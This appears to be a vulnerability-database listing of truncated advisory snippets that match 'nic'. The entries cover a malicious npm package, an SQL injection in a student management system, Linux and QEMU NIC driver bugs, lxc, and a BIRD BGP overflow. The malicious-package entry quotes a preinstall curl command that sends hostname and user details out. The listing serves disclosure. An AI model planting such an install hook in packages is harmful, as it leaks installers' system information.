Malicious code in nic-datagov (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...

MAL-2026-5836 Malicious code in nic-datagov (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...

CVE-2026-11475

A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...

CVE-2026-46287

In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...

UBUNTU-CVE-2026-46287

In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...

CVE-2026-46287

In the Linux kernel, the net/txgbe driver for copper NICs with external PHY fixed an RTNL assertion warning that occurred during module removal. The root cause was phylink_disconnect_phy() being called during remove without proper RTNL protection, triggering an assertion in phylink_disconnect_phy...

CVE-2026-46287

In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...

CVE-2026-46287 net: txgbe: fix RTNL assertion warning when remove module

In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...

CVE-2026-11475 Kushan2k student-management-system Certificate Verification Endpoint GradeController.php getStatus sql injection

A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...

CVE-2026-11475

A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...

CVE-2026-11475

The CVE-2026-11475 affects Kushan2k student-management-system. Affects the function getStatus in controllers/GradeController.php of the Certificate Verification Endpoint. The underlying issue is that manipulating the nic argument can cause an SQL injection, enabling remote exploitation. Public ex...

CVE-2026-11475 Kushan2k student-management-system Certificate Verification Endpoint GradeController.php getStatus sql injection

A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...

Student-Management-System 注入漏洞

Student-Management-System is an open-source student information management system developed by Cyber-III. There is a vulnerability in Student-Management-System, which stems from improper handling of the parameter “nic” in the getStatus function of the controllers/GradeController.php file at the...

PT-2026-47237

A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...

PT-2026-47359

Name of the Vulnerable Software and Affected Versions Linux kernel versions prior to 7.0.12-1.1 Description An RTNL assertion warning occurs in the txgbe driver for copper NICs with an external PHY during module removal. This happens because the phylink disconnect phy function is called without t...

Updated lxc packages fix security vulnerability

CVE-2026-39402, lxc lxc-user-nic insufficient ownership validation allows cross-tenant OVS port deletion...

MGASA-2026-0172 Updated lxc packages fix security vulnerability

CVE-2026-39402, lxc lxc-user-nic insufficient ownership validation allows cross-tenant OVS port deletion...

CVE-2026-49943

CZ.NIC BIRD Internet Routing Daemon through 2.19.0 contains a stack-based buffer overflow in the BGP ASPATH mask matching implementation in nest/a-path.c. The aspathmatch function uses a fixed-size stack array of 2048 + 1 pmpos entries, while parsepath expands ASPATH segments from a received BGP...

Astra Linux - уязвимость в qemu

A potential stack overflow issue due to an infinite loop was identified in various NIC emulators of QEMU, in versions up to and including 5.2.0. The issue occurs in the loopback mode of a NIC, where reentrant DMA checks are bypassed. A guest user/process may exploit this flaw to consume CPU cycle...

Astra Linux - уязвимость в qemu

A reentrancy issue related to DMA operations led to a use-after-free error in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service...